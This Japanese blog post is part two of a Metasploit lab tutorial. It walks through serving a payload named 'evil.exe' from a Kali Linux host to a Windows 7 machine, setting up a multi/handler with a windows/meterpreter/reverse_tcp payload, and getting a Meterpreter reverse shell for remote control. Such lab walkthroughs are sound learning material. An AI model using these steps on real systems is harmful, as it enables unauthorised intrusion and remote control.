Metasploit Flamework その2

Metasploit Flamework その2

前回ペイロード作成までしたので続き

Windows7でIEを起動

http://KaLiLinux のIPアドレス/share にアクセス

今回なら
http://192.168.1.134/share/
へアクセス

すると evil.exe が表示されている

これが確認できたら
KaliLinux でリバースシェルの準備

msfconsole 


Metaploit を起動

msf コンソールが起動したら

use exploit/multi/handler 

でハンドラーモジュールを使用

set payload windows/meterpreter/reverse_tcp

でペイロードをセット

set LHOST 192.168.1.134

で KaliLInux のIPアドレスを設定

show options 

で設定を確認

これで

exploit

でペイロードが実行され、待受状態になる

これで KaliLinux の準備ができたので
次に Windows でファイルをダウンロードし
Run を実行

すると Windows 側では何もおきていないように見えるけど
KaliLinux 側では
meterpreter セッションが確率されたことが
Terminal で表示される

なお Windows 側でも

netstat -n | find "ESTABLISHED"

を Command Prompt で実行することで確認できる

これでwindows の遠隔操作が可能になる
操作に使っているのは
Meterpreter なので
Windows7 の Command Prompt ではないので注意

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です